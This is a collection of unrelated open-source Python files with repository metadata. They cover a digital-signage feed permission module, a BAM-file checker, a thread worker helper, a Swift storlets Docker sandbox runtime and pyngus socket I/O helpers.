Here, given the pars dictionary that was passed to getClamps, we make sure that all needed
elements are present, and substitute logical values for those that are missing
:returns: updated pars dictionary
"""
if pars is None:
pars = {}
# neededKeys = ['limits', 'cmin', 'cmax', 'KeepT', 'sequence1', 'sequence2']
# hmm. could do this as a dictionary of value: default pairs and a loop
k = pars.keys()
if 'limits' not in k:
pars['limits'] = False
if 'cmin' not in k:
pars['cmin'] = -np.inf
pars['cmax'] = np.inf
if 'KeepT' not in k:
pars['KeepT'] = False
# sequence selections:
# pars[''sequence'] is a dictionary
# The dictionary has 'index' (currentIndex()) and 'count' from the GUI
if 'sequence1' not in k:
pars['sequence1'] = {'index': 0} # index of '0' is "All"
pars['sequence1']['count'] = 0
if 'sequence2' not in k:
pars['sequence2'] = {'index': 0}
pars['sequence2']['count'] = 0
return pars
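# Hedged usage sketch (added): from an analysis module's loadFileRequested, the
# class is typically driven as below ('dh' is a protocol DirHandle; the pars
# override shown is optional):
#
#     clamps = GetClamps()
#     info = clamps.getClampData(dh, pars={'KeepT': True})
#     if info is not None:
#         traces = clamps.traces        # MetaArray, one row per command level
#         t = clamps.time_base          # shared time axis, in seconds
#         mode = clamps.data_mode       # e.g. 'IC' or 'VC'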
|
mit
| 6,986,205,411,136,417,000 | 38.455324 | 131 | 0.58452 | false |
danthedeckie/streetsign
|
streetsign_server/logic/feeds_and_posts.py
|
1
|
5888
|
# -*- coding: utf-8 -*-
# StreetSign Digital Signage Project
# (C) Copyright 2013 Daniel Fairhead
#
# StreetSign is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# StreetSign is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with StreetSign. If not, see <http://www.gnu.org/licenses/>.
#
# -------------------------------
"""
---------------------------------------
streetsign_server.logic.feeds_and_posts
---------------------------------------
logic for feeds_and_posts views, separated out for clarity.
"""
from datetime import datetime
from flask import flash, url_for, json
from streetsign_server.views.utils import PleaseRedirect, \
getstr, getint, getbool, \
STRIPSTR, DATESTR
from streetsign_server.models import Feed, now
def try_to_set_feed(post, new_feed_id, user):
''' Is this user actually allowed to set the feed of this post to what
the form is saying they want to? If so, cool. Return that feed. '''
try:
if post.feed:
oldfeedid = post.feed.id
else:
oldfeedid = False
except:
oldfeedid = False
if new_feed_id and new_feed_id != oldfeedid:
# new or changed feed.
try:
feed = Feed.get(Feed.id == new_feed_id)
except Feed.DoesNotExist:
raise PleaseRedirect(None,
"Odd. You somehow tried to post "
"to a non-existant feed. It didn't work.")
if feed.user_can_write(user):
flash('Posted to ' + feed.name)
return feed
else:
# This shouldn't happen very often - so don't worry about
# losing post data. If it's an issue, refactor so it's stored
# but not written to the feed...
raise PleaseRedirect(
url_for('index'),
"Sorry, you don't have permission to write to " + feed.name)
return feed
return post.feed
def if_i_cant_write_then_i_quit(post, user):
''' checks if a post is editable by a user. If it isn't, for
whatever reason, then raise an appropriate 'PleaseRedirect'
exception. (reasons could be that it's in a feed we don't
have write access to, or it's been published, and we don't
have publish permission to that feed, so the post is now
'locked' to us.) '''
# if we don't have write permission, then this isn't our post!
if not post.feed.user_can_write(user):
raise PleaseRedirect(
None,
"Sorry, this post is in feed '{0}', which"
" you don't have permission to post to."
" Edit cancelled.".format(post.feed.name))
# if this post is already published, be careful about editing it!
if post.published and not post.feed.user_can_publish(user):
raise PleaseRedirect(
None,
'Sorry, this post is published,'
' and you do not have permission to'
' edit published posts in "{0}".'.format(post.feed.name))
return True
def can_user_write_and_publish(user, post):
''' returns a tuple, expressing if 'user' has permission to
write and publish a post. '''
if not post.feed:
if user.writeable_feeds():
return True, False
else: # there is a feed selected
if post.feed.user_can_write(user):
if post.feed.user_can_publish(user):
return True, True
else:
return True, False
# default is secure:
return False, False
def clean_date(in_text):
''' take some input text, and return a datetime, if possible. '''
return datetime.strptime(in_text.split('.')[0], "%Y-%m-%d %H:%M:%S")
def post_form_intake(post, form, editor):
''' takes the values from 'form', passes the post contents to
the editor 'receive' function, and adds all the values into
the 'post' object.
NOTE: this actually modifies the post it is sent!
'''
post.content = json.dumps(editor.receive(form))
post.status = 0 # any time a post is edited, remove it from archive.
post.time_restrictions_show = \
(form.get('times_mode', 'do_not_show') == 'only_show')
post.time_restrictions = form.get('time_restrictions_json', '[]')
post.display_time = \
getint('displaytime', 8, minimum=2, maximum=100, form=form)
post.active_start = \
getstr('active_start', post.active_start, validate=DATESTR, form=form)
post.active_end = \
getstr('active_end', post.active_end, validate=DATESTR, form=form)
post.write_date = now()
def delete_post_and_run_callback(post, typemodule):
''' before a post is actually deleted, check if there is a 'pre-delete'
callback on this post type, and run that first. This way, for uploaded
images (for instance), the file can be deleted as well. '''
try:
typemodule.delete(json.loads(post.content))
    except AttributeError:
        # There's no callback for this posttype, which is fine.
        # Most post types store no external data, and so don't need
        # to do anything.
        pass
except Exception as excp:
flash(str(excp))
return post.delete_instance()
|
gpl-3.0
| -3,678,719,408,436,776,400 | 34.257485 | 79 | 0.60411 | false |
ngsutils/ngsutils
|
ngsutils/bam/check.py
|
1
|
1354
|
#!/usr/bin/env python
## category Misc
## desc Checks a BAM file for corruption
'''
Checks a BAM file for corruption
'''
import sys
import os
import ngsutils.bam
def bam_check(fname, quiet=False):
if not quiet:
sys.stdout.write('%s: ' % fname)
sys.stdout.flush()
fail = False
i = 1
try:
bamfile = ngsutils.bam.bam_open(fname)
for read in ngsutils.bam.bam_iter(bamfile):
i += 1
bamfile.close()
except KeyboardInterrupt:
if not quiet:
sys.stdout.write('\n')
sys.exit(-1)
except:
fail = True
if fail:
if not quiet:
sys.stdout.write('ERROR! (line %s)\n' % (i + 1))
return False
if not quiet:
sys.stdout.write('OK\n')
return True
def usage():
print __doc__
print "Usage: bamutils check bamfile..."
sys.exit(-1)
if __name__ == "__main__":
fnames = []
for arg in sys.argv[1:]:
if arg == "-h":
usage()
elif os.path.exists(arg):
fnames.append(arg)
else:
sys.stderr.write("File: %s not found!\n" % arg)
usage()
if not fnames:
usage()
fail = False
for f in fnames:
if not bam_check(f):
fail = True
if fail:
sys.exit(1)
|
bsd-3-clause
| 1,421,671,888,555,323,100 | 18.623188 | 60 | 0.512555 | false |
jmercier/Codebench
|
threads.py
|
1
|
2394
|
import threading
import Queue
import traceback
from functools import wraps
class Worker(threading.Thread):
stopevent = False
def __init__(self, *args, **kw):
threading.Thread.__init__(self, *args, **kw)
self.q = Queue.Queue()
self.start()
def run(self):
o = self.q.get()
while not self.stopevent:
fct, args, kw, evt = o
try:
fct(*args, **kw)
except:
traceback.print_exc()
finally:
if evt is not None:
evt.set()
o = self.q.get()
q = self.q
self.q = None
fct, args, kw, evt = o
if evt is not None:
evt.set()
while not q.empty():
fct, args, kw, evt = q.get()
if evt is not None:
evt.set()
def __callInThread__(self, fct, args, kw, evt):
if not callable(fct):
raise RuntimeError("first argument must be callable")
if self.q is None:
return
self.q.put((fct, args, kw, evt))
def __call__(self, fct, *args, **kw):
self.__callInThread__(fct, args, kw, None)
def blockingCall(self, fct, *args, **kw):
evt = threading.Event()
self.__callInThread__(fct, args, kw, evt)
evt.wait()
def stop(self, join = True):
self.stopevent = True
if self.q is not None and self.q.empty():
self.q.put((None, None, None, None))
self.join()
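# Illustrative usage sketch (not part of the original module); 'work' and
# its argument are hypothetical.
def _example_worker_usage():
    def work(msg):
        print msg
    w = Worker()
    w(work, 'runs asynchronously')               # fire-and-forget
    w.blockingCall(work, 'runs, then returns')   # waits on the event
    w.stop()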
class inworker(object):
"""
If your application have "inworker" thread you should
clean the worker threads by calling the cleanup function
"""
workers = {}
worker = None
def __init__(self, name, worker_type = Worker):
self.name = name
self.worker_type = worker_type
def __call__(self, fct):
@wraps(fct)
def wrapper(*args, **kw):
if self.worker is None:
self.worker = self.worker_type()
self.workers[self.name] = self.worker
self.worker(fct, *args, **kw)
return wrapper
@classmethod
def cleanup(cls):
while len(cls.workers) != 0:
n, w = cls.workers.popitem()
w.stop()
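# Illustrative decorator sketch (not part of the original module): every
# call to the function below is queued onto one named worker thread, and
# inworker.cleanup() joins it at shutdown. The file path is a made-up
# placeholder.
@inworker('example_io')
def _example_save(data):
    with open('/tmp/example.dat', 'a') as fobj:
        fobj.write(data)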
try:
import pycuda.driver as drv
import pycuda.tools
drv.init()
    class CudaWorker(Worker):
        def __init__(self, deviceId = None):
            # Store the device id before Worker.__init__, which starts the
            # thread (and therefore run()) immediately.
            self.deviceId = deviceId
            Worker.__init__(self)
        def run(self):
            if self.deviceId is None:
                dev = pycuda.tools.get_default_device()
            else:
                dev = drv.Device(self.deviceId)
            ctx = dev.make_context()
            Worker.run(self)
            ctx.pop()
incuda = inworker("cuda", worker_type = CudaWorker)
except:
traceback.print_exc()
|
mit
| -5,936,050,376,260,728,000 | 22.70297 | 68 | 0.597744 | false |
Open-I-Beam/swift-storlets
|
Engine/swift/storlet_gateway/storlet_runtime.py
|
1
|
24362
|
'''-------------------------------------------------------------------------
Copyright IBM Corp. 2015, 2015 All Rights Reserved
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-------------------------------------------------------------------------'''
'''
Created on Feb 10, 2015
@author: eranr
'''
import os
import time
import stat
import select
import commands
import eventlet
from eventlet.timeout import Timeout
import json
import shutil
import sys
from swift.common.constraints import MAX_META_OVERALL_SIZE
from swift.common.swob import HTTPBadRequest, Request,\
HTTPInternalServerError
from SBusPythonFacade.SBus import *
from SBusPythonFacade.SBusDatagram import *
from SBusPythonFacade.SBusStorletCommand import *
from SBusPythonFacade.SBusFileDescription import *
from storlet_middleware.storlet_common import StorletLogger
eventlet.monkey_patch()
'''---------------------------------------------------------------------------
Sandbox API
'''
class RunTimePaths():
'''
    The Storlet Engine needs to access resources located in several paths:
1. The various communication channels represented as pipes in the filesystem
2. Directories where to place Storlets
3. Directories where to place logs
Communication channels
----------------------
The RunTimeSandbox communicates with the Sandbox via two types of pipes
1. factory pipe - defined per account, used for communication with the sandbox
for e.g. start/stop a storlet daemon
2. Storlet pipe - defined per account and Storlet, used for communication
with a storlet daemon, e.g. to call the invoke API
Each pipe type has two paths:
1. A path that is inside the sandbox
2. A path that is outside of the sandbox or at the host side. As such
this path is prefixed by 'host_'
Thus, we have the following 4 paths of interest:
1. sandbox_factory_pipe_path
2. host_factory_pipe_path
3. sandbox_storlet_pipe_path
4. host_storlet_pipe_path
Our implementation uses the following path structure for the various pipes:
In the host, all pipes belonging to a given account are prefixed by
<pipes_dir>/<account>, where <pipes_dir> comes from the configuration
Thus:
host_factory_pipe_path is of the form <pipes_dir>/<account>/factory_pipe
host_storlet_pipe_path is of the form <pipes_dir>/<account>/<storlet_id>
In The sandbox side
sandbox_factory_pipe_path is of the form /mnt/channels/factory_pipe
sandbox_storlet_pipe_path is of the form /mnt/channels/<storlet_id>
Storlets Locations
------------------
The Storlet binaries are accessible from the sandbox using a mounted directory.
    This directory is called the storlet directory.
On the host side it is of the form <storlet_dir>/<account>/<storlet_name>
On the sandbox side it is of the form /home/swift/<storlet_name>
<storlet_dir> comes from the configuration
<storlet_name> is the prefix of the jar.
Logs
----
Logs are located in paths of the form:
<log_dir>/<account>/<storlet_name>.log
'''
def __init__(self, account, conf):
self.account = account
self.scope = account[5:18]
self.host_restart_script_dir = conf['script_dir']
self.host_pipe_root = conf['pipes_dir']
self.factory_pipe_suffix = 'factory_pipe'
self.sandbox_pipe_prefix = '/mnt/channels'
self.storlet_pipe_suffix = '_storlet_pipe'
self.sandbox_storlet_dir_prefix = '/home/swift'
self.host_storlet_root = conf['storlets_dir']
self.host_log_path_root = conf['log_dir']
self.host_cache_root = conf['cache_dir']
self.storlet_container = conf['storlet_container']
self.storlet_dependency = conf['storlet_dependency']
def host_pipe_prefix(self):
return os.path.join(self.host_pipe_root, self.scope)
def create_host_pipe_prefix(self):
path = self.host_pipe_prefix()
if not os.path.exists(path):
os.makedirs(path)
# 0777 should be 0700 when we get user namespaces in Docker
os.chmod(path, stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)
def host_factory_pipe(self):
return os.path.join(self.host_pipe_prefix(),
self.factory_pipe_suffix)
def host_storlet_pipe(self, storlet_id):
return os.path.join(self.host_pipe_prefix(),
storlet_id)
def sbox_storlet_pipe(self, storlet_id):
return os.path.join(self.sandbox_pipe_prefix,
storlet_id)
def sbox_storlet_exec(self, storlet_id):
return os.path.join(self.sandbox_storlet_dir_prefix, storlet_id)
def host_storlet_prefix(self):
return os.path.join(self.host_storlet_root, self.scope)
def host_storlet(self, storlet_id):
return os.path.join(self.host_storlet_prefix(), storlet_id)
def slog_path(self, storlet_id):
log_dir = os.path.join(self.host_log_path_root, self.scope, storlet_id)
if not os.path.exists(log_dir):
os.makedirs(log_dir)
return log_dir
def get_host_storlet_cache_dir(self):
return os.path.join(self.host_cache_root, self.scope,self.storlet_container)
def get_host_dependency_cache_dir(self):
return os.path.join(self.host_cache_root, self.scope,self.storlet_dependency)
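# Illustrative sketch (not part of the original module): mapping a made-up
# configuration to concrete host-side paths.
def _example_runtime_paths():
    conf = {'script_dir': '/opt/storlets/scripts',
            'pipes_dir': '/var/run/storlets/pipes',
            'storlets_dir': '/var/lib/storlets',
            'log_dir': '/var/log/storlets',
            'cache_dir': '/var/cache/storlets',
            'storlet_container': 'storlet',
            'storlet_dependency': 'dependency'}
    paths = RunTimePaths('AUTH_0123456789abc', conf)
    # scope is account[5:18], so both paths land under '0123456789abc'
    print paths.host_factory_pipe()        # .../pipes/0123456789abc/factory_pipe
    print paths.host_storlet('mystorlet')  # .../storlets/0123456789abc/mystorlet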
'''---------------------------------------------------------------------------
Docker Stateful Container API
The RunTimeSandbox serve as an API between the Docker Gateway and
a re-usable per account sandbox
---------------------------------------------------------------------------'''
class RunTimeSandbox():
'''
The RunTimeSandbox represents a re-usable per account sandbox. The sandbox
is re-usable in the sense that it can run several storlet daemons.
The following methods are supported:
ping - pings the sandbox for liveness
wait - wait for the sandbox to be ready for processing commands
restart - restart the sandbox
start_storlet_daemon - start a daemon for a given storlet
stop_storlet_daemon - stop a daemon of a given storlet
get_storlet_daemon_status - test if a given storlet daemon is running
'''
def __init__(self, account, conf, logger):
self.paths = RunTimePaths(account, conf)
self.account = account
self.sandbox_ping_interval = 0.5
self.sandbox_wait_timeout = int(conf['restart_linux_container_timeout'])
self.docker_repo = conf['docker_repo']
self.docker_image_name_prefix = 'tenant'
# TODO: should come from upper layer Storlet metadata
self.storlet_language = 'java'
# TODO: add line in conf
self.storlet_daemon_thread_pool_size = int(conf.get('storlet_daemon_thread_pool_size',5))
self.storlet_daemon_debug_level = conf.get('storlet_daemon_debug_level','TRACE')
# TODO: change logger's route if possible
self.logger = logger
def _parse_sandbox_factory_answer(self, str_answer):
two_tokens = str_answer.split(':', 1)
b_success = False
if two_tokens[0] == 'True':
b_success = True
return b_success, two_tokens[1]
def ping(self):
pipe_path = self.paths.host_factory_pipe()
read_fd, write_fd = os.pipe()
dtg = SBusDatagram.create_service_datagram( SBUS_CMD_PING, write_fd )
rc = SBus.send( pipe_path, dtg )
if (rc < 0):
return -1
reply = os.read(read_fd,10)
os.close(read_fd)
os.close(write_fd)
res, error_txt = self._parse_sandbox_factory_answer(reply)
if res == True:
return 1
return 0
def wait(self):
do_wait = True
up = 0
to = Timeout(self.sandbox_wait_timeout)
try:
while do_wait == True:
rc = self.ping()
if (rc != 1):
time.sleep(self.sandbox_ping_interval)
continue
else:
to.cancel()
do_wait = False
up = 1
except Timeout as t:
self.logger.info("wait for sandbox %s timedout" % self.account)
do_wait = False
finally:
to.cancel()
return up
def restart(self):
'''
Restarts the account's sandbox
Returned value:
True - If the sandbox was started successfully
False - Otherwise
'''
# Extract the account's ID from the account
if self.account.lower().startswith('auth_'):
account_id = self.account[len('auth_'):]
else:
account_id = self.account
self.paths.create_host_pipe_prefix()
docker_container_name = '%s_%s' % (self.docker_image_name_prefix,
account_id)
docker_image_name = '%s/%s' % (self.docker_repo,account_id)
pipe_mount = '%s:%s' % (self.paths.host_pipe_prefix(),
self.paths.sandbox_pipe_prefix)
storlet_mount = '%s:%s' % (self.paths.host_storlet_prefix(),
self.paths.sandbox_storlet_dir_prefix)
cmd = '%s/restart_docker_container %s %s %s %s' % (
self.paths.host_restart_script_dir,
docker_container_name,
docker_image_name,
pipe_mount,
storlet_mount)
res = commands.getoutput(cmd)
return self.wait()
def start_storlet_daemon(self, spath, storlet_id):
prms = {}
prms['daemon_language'] = 'java'
prms['storlet_path'] = spath
prms['storlet_name'] = storlet_id
prms['uds_path'] = self.paths.sbox_storlet_pipe(storlet_id)
prms['log_level'] = self.storlet_daemon_debug_level
prms['pool_size'] = self.storlet_daemon_thread_pool_size
read_fd, write_fd = os.pipe()
dtg = SBusDatagram.create_service_datagram( SBUS_CMD_START_DAEMON,
write_fd )
dtg.set_exec_params( prms )
pipe_path = self.paths.host_factory_pipe()
rc = SBus.send( pipe_path, dtg )
if (rc < 0):
return -1
reply = os.read(read_fd,10)
os.close(read_fd)
os.close(write_fd)
res, error_txt = self._parse_sandbox_factory_answer(reply)
if res == True:
return 1
return 0
def stop_storlet_daemon(self, storlet_id):
read_fd, write_fd = os.pipe()
dtg = SBusDatagram.create_service_datagram( SBUS_CMD_STOP_DAEMON,
write_fd )
dtg.add_exec_param('storlet_name', storlet_id)
pipe_path = self.paths.host_factory_pipe()
rc = SBus.send( pipe_path, dtg )
if (rc < 0):
self.logger.info("Failed to send status command to %s %s" % (self.account, storlet_id))
return -1
reply = os.read(read_fd,10)
os.close(read_fd)
os.close(write_fd)
res, error_txt = self._parse_sandbox_factory_answer(reply)
if res == True:
return 1
return 0
def get_storlet_daemon_status(self, storlet_id):
read_fd, write_fd = os.pipe()
dtg = SBusDatagram.create_service_datagram( SBUS_CMD_DAEMON_STATUS,
write_fd )
dtg.add_exec_param( 'storlet_name', storlet_id)
pipe_path = self.paths.host_factory_pipe()
rc = SBus.send(pipe_path, dtg)
if (rc < 0):
self.logger.info("Failed to send status command to %s %s" % (self.account, storlet_id))
return -1
reply = os.read(read_fd,10)
os.close(read_fd)
os.close(write_fd)
res, error_txt = self._parse_sandbox_factory_answer(reply)
if res == True:
return 1
return 0
def activate_storlet_daemon(self, invocation_data, cache_updated = True):
storlet_daemon_status = self.get_storlet_daemon_status(invocation_data['storlet_main_class'])
if (storlet_daemon_status == -1):
# We failed to send a command to the factory.
# Best we can do is execute the container.
self.logger.debug('Failed to check Storlet daemon status, restart Docker container')
res = self.restart()
if (res != 1):
raise Exception('Docker container is not responsive')
storlet_daemon_status = 0
if (cache_updated == True and storlet_daemon_status == 1):
# The cache was updated while the daemon is running we need to stop it.
self.logger.debug('The cache was updated, and the storlet daemon is running. Stopping daemon')
res = self.stop_storlet_daemon( invocation_data['storlet_main_class'] )
if res != 1:
res = self.restart()
if (res != 1):
raise Exception('Docker container is not responsive')
else:
                self.logger.debug('Daemon stopped')
storlet_daemon_status = 0
if (storlet_daemon_status == 0):
self.logger.debug('Going to start storlet daemon!')
class_path = '/home/swift/%s/%s' % (invocation_data['storlet_main_class'],
invocation_data['storlet_name'])
for dep in invocation_data['storlet_dependency'].split(','):
class_path = '%s:/home/swift/%s/%s' %\
(class_path,
invocation_data['storlet_main_class'],
dep)
daemon_status = self.start_storlet_daemon(
class_path,
invocation_data['storlet_main_class'])
if daemon_status != 1:
self.logger.error('Daemon start Failed, returned code is %d' % daemon_status)
raise Exception('Daemon start failed')
else:
self.logger.debug('Daemon started')
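# Illustrative sketch (not part of the original module): the liveness flow
# a gateway might run before invoking a storlet. 'conf' and 'logger' are
# assumed to come from the caller.
def _example_sandbox_flow(account, conf, logger):
    sbox = RunTimeSandbox(account, conf, logger)
    if sbox.ping() != 1:
        # restart() blocks until the factory answers ping or the
        # restart_linux_container_timeout expires
        if sbox.restart() != 1:
            raise Exception('sandbox for %s did not come up' % account)
    return sbox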
'''---------------------------------------------------------------------------
Storlet Daemon API
The StorletInvocationGETProtocol, StorletInvocationPUTProtocol, StorletInvocationSLOProtocol
serve as an API between the Docker Gateway and the Storlet Daemon, which
runs inside the Docker container. These classes implement the Storlet execution
protocol
---------------------------------------------------------------------------'''
class StorletInvocationProtocol():
def _add_input_stream(self, appendFd):
#self.fds.append(self.srequest.stream
self.fds.append(appendFd)
# TODO: Break request metadata and systemmetadata
md = dict()
md['type'] = SBUS_FD_INPUT_OBJECT
if self.srequest.user_metadata is not None:
for key, val in self.srequest.user_metadata.iteritems():
md[key] = val
self.fdmd.append(md)
def _add_output_stream(self):
self.fds.append(self.execution_str_write_fd)
md = dict()
md['type'] = SBUS_FD_OUTPUT_TASK_ID
self.fdmd.append(md)
self.fds.append(self.data_write_fd)
md = dict()
md['type'] = SBUS_FD_OUTPUT_OBJECT
self.fdmd.append(md)
self.fds.append(self.metadata_write_fd)
md = dict()
md['type'] = SBUS_FD_OUTPUT_OBJECT_METADATA
self.fdmd.append(md)
def _add_logger_stream(self):
self.fds.append(self.storlet_logger.getfd())
md = dict()
md['type'] = SBUS_FD_LOGGER
self.fdmd.append(md)
def _prepare_invocation_descriptors(self):
# Add the input stream
self._add_input_stream()
# Add the output stream
self.data_read_fd, self.data_write_fd = os.pipe()
self.execution_str_read_fd, self.execution_str_write_fd = os.pipe()
self.metadata_read_fd, self.metadata_write_fd = os.pipe()
self._add_output_stream()
# Add the logger
self._add_logger_stream()
def _close_remote_side_descriptors(self):
if self.data_write_fd:
os.close(self.data_write_fd)
if self.metadata_write_fd:
os.close(self.metadata_write_fd)
if self.execution_str_write_fd:
os.close(self.execution_str_write_fd)
def _cancel(self):
read_fd, write_fd = os.pipe()
dtg = SBusDatagram.create_service_datagram( SBUS_CMD_CANCEL, write_fd )
dtg.set_task_id(self.task_id)
rc = SBus.send( self.storlet_pipe_path, dtg )
if (rc < 0):
return -1
reply = os.read(read_fd,10)
os.close(read_fd)
os.close(write_fd)
def _invoke(self):
dtg = SBusDatagram()
dtg.set_files( self.fds )
dtg.set_metadata( self.fdmd )
dtg.set_exec_params( self.srequest.params )
dtg.set_command(SBUS_CMD_EXECUTE)
rc = SBus.send( self.storlet_pipe_path, dtg )
if (rc < 0):
raise Exception("Failed to send execute command")
self._wait_for_read_with_timeout(self.execution_str_read_fd)
self.task_id = os.read(self.execution_str_read_fd, 10)
def __init__(self, srequest, storlet_pipe_path, storlet_logger_path, timeout):
self.srequest = srequest
self.storlet_pipe_path = storlet_pipe_path
self.storlet_logger_path = storlet_logger_path
self.timeout = timeout
# remote side file descriptors and their metadata lists
# to be sent as part of invocation
self.fds = list()
self.fdmd = list()
# local side file descriptors
self.data_read_fd = None
self.data_write_fd = None
self.metadata_read_fd = None
self.metadata_write_fd = None
self.execution_str_read_fd = None
self.execution_str_write_fd = None
self.task_id = None
if not os.path.exists(storlet_logger_path):
os.makedirs(storlet_logger_path)
def _wait_for_read_with_timeout(self, fd):
r, w, e = select.select([ fd ], [], [ ], self.timeout)
if len(r) == 0:
if self.task_id:
self._cancel()
raise Timeout('Timeout while waiting for storlet output')
if fd in r:
return
def _read_metadata(self):
self._wait_for_read_with_timeout(self.metadata_read_fd)
flat_json = os.read(self.metadata_read_fd, MAX_META_OVERALL_SIZE)
if flat_json is not None:
md = json.loads(flat_json)
return md
class StorletInvocationGETProtocol(StorletInvocationProtocol):
def _add_input_stream(self):
StorletInvocationProtocol._add_input_stream(self, self.srequest.stream)
def __init__(self, srequest, storlet_pipe_path, storlet_logger_path, timeout):
StorletInvocationProtocol.__init__(self, srequest, storlet_pipe_path, storlet_logger_path, timeout)
def communicate(self):
self.storlet_logger = StorletLogger(self.storlet_logger_path, 'storlet_invoke')
self.storlet_logger.open()
self._prepare_invocation_descriptors()
try:
self._invoke()
except Exception as e:
raise e
finally:
self._close_remote_side_descriptors()
self.storlet_logger.close()
out_md = self._read_metadata()
os.close(self.metadata_read_fd)
self._wait_for_read_with_timeout(self.data_read_fd)
os.close(self.execution_str_read_fd)
return out_md, self.data_read_fd
class StorletInvocationProxyProtocol(StorletInvocationProtocol):
def __init__(self, srequest, storlet_pipe_path, storlet_logger_path, timeout):
StorletInvocationProtocol.__init__(self, srequest, storlet_pipe_path, storlet_logger_path, timeout)
self.input_data_read_fd, self.input_data_write_fd = os.pipe()
        # This pipe carries data from srequest.stream to input_data_write_fd;
        # the write side stays with us, the read side is sent to the storlet.
def _add_input_stream(self):
StorletInvocationProtocol._add_input_stream(self, self.input_data_read_fd)
def _wait_for_write_with_timeout(self,fd):
r, w, e = select.select([ ], [ fd ], [ ], self.timeout)
if len(w) == 0:
raise Timeout('Timeout while waiting for storlet to read')
if fd in w:
return
def _write_with_timeout(self, writer, chunk):
timeout = Timeout(self.timeout)
try:
writer.write(chunk)
except Timeout as t:
if t is timeout:
writer.close()
raise t
except Exception as e:
raise e
finally:
timeout.cancel()
def communicate(self):
self.storlet_logger = StorletLogger(self.storlet_logger_path, 'storlet_invoke')
self.storlet_logger.open()
self._prepare_invocation_descriptors()
try:
self._invoke()
except Exception as e:
raise e
finally:
self._close_remote_side_descriptors()
self.storlet_logger.close()
self._wait_for_write_with_timeout(self.input_data_write_fd)
# We do the writing in a different thread.
# Otherwise, we can run into the following deadlock
# 1. middleware writes to Storlet
# 2. Storlet reads and starts to write metadata and then data
# 3. middleware continues writing
# 4. Storlet continues writing and gets stuck as middleware
# is busy writing, but still not consuming the reader end
# of the Storlet writer.
eventlet.spawn_n(self._write_input_data)
out_md = self._read_metadata()
self._wait_for_read_with_timeout(self.data_read_fd)
return out_md, self.data_read_fd
class StorletInvocationPUTProtocol(StorletInvocationProxyProtocol):
def __init__(self, srequest, storlet_pipe_path, storlet_logger_path, timeout):
StorletInvocationProxyProtocol.__init__(self, srequest, storlet_pipe_path, storlet_logger_path, timeout)
def _write_input_data(self):
writer = os.fdopen(self.input_data_write_fd, 'w')
reader = self.srequest.stream
for chunk in iter(lambda: reader(65536), ''):
self._write_with_timeout(writer, chunk)
writer.close()
class StorletInvocationSLOProtocol(StorletInvocationProxyProtocol):
def __init__(self, srequest, storlet_pipe_path, storlet_logger_path, timeout):
StorletInvocationProxyProtocol.__init__(self, srequest, storlet_pipe_path, storlet_logger_path, timeout)
def _write_input_data(self):
writer = os.fdopen(self.input_data_write_fd, 'w')
reader = self.srequest.stream
# print >> sys.stdout, ' type of reader %s'% (type(reader))
for chunk in reader:
self._write_with_timeout(writer, chunk)
# print >> sys.stderr, 'next SLO chunk...%d'% len(chunk)
writer.close()
|
apache-2.0
| 412,615,498,885,021,600 | 37.305031 | 112 | 0.578729 | false |
irinabov/debian-pyngus
|
pyngus/sockets.py
|
1
|
4044
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""helper methods that provide boilerplate socket I/O and Connection
processing.
"""
__all__ = [
"read_socket_input",
"write_socket_output"
]
import errno
import logging
import socket
from pyngus.connection import Connection
LOG = logging.getLogger(__name__)
def read_socket_input(connection, socket_obj):
"""Read from the network layer and processes all data read. Can
support both blocking and non-blocking sockets.
Returns the number of input bytes processed, or EOS if input processing
is done. Any exceptions raised by the socket are re-raised.
"""
count = connection.needs_input
if count <= 0:
return count # 0 or EOS
while True:
try:
sock_data = socket_obj.recv(count)
break
except socket.timeout as e:
LOG.debug("Socket timeout exception %s", str(e))
raise # caller must handle
except socket.error as e:
LOG.debug("Socket error exception %s", str(e))
err = e.errno
if err in [errno.EAGAIN,
errno.EWOULDBLOCK,
errno.EINTR]:
# try again later
return 0
# otherwise, unrecoverable, caller must handle
raise
except Exception as e: # beats me... assume fatal
LOG.debug("unknown socket exception %s", str(e))
raise # caller must handle
if len(sock_data) > 0:
count = connection.process_input(sock_data)
else:
LOG.debug("Socket closed")
count = Connection.EOS
connection.close_input()
connection.close_output()
LOG.debug("Socket recv %s bytes", count)
return count
def write_socket_output(connection, socket_obj):
"""Write data to the network layer. Can support both blocking and
non-blocking sockets.
Returns the number of output bytes sent, or EOS if output processing
is done. Any exceptions raised by the socket are re-raised.
"""
count = connection.has_output
if count <= 0:
return count # 0 or EOS
data = connection.output_data()
if not data:
# error - has_output > 0, but no data?
return Connection.EOS
while True:
try:
count = socket_obj.send(data)
break
except socket.timeout as e:
LOG.debug("Socket timeout exception %s", str(e))
raise # caller must handle
except socket.error as e:
LOG.debug("Socket error exception %s", str(e))
err = e.errno
if err in [errno.EAGAIN,
errno.EWOULDBLOCK,
errno.EINTR]:
# try again later
return 0
# else assume fatal let caller handle it:
raise
except Exception as e: # beats me... assume fatal
LOG.debug("unknown socket exception %s", str(e))
raise
if count > 0:
LOG.debug("Socket sent %s bytes", count)
connection.output_written(count)
elif data:
LOG.debug("Socket closed")
count = Connection.EOS
connection.close_output()
connection.close_input()
return count
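# Illustrative sketch (not part of the original module): one send/receive
# pass built from the two helpers above. 'connection' is a pyngus
# Connection and 'sock' a connected blocking socket; select() polling,
# timers and error recovery are deliberately elided.
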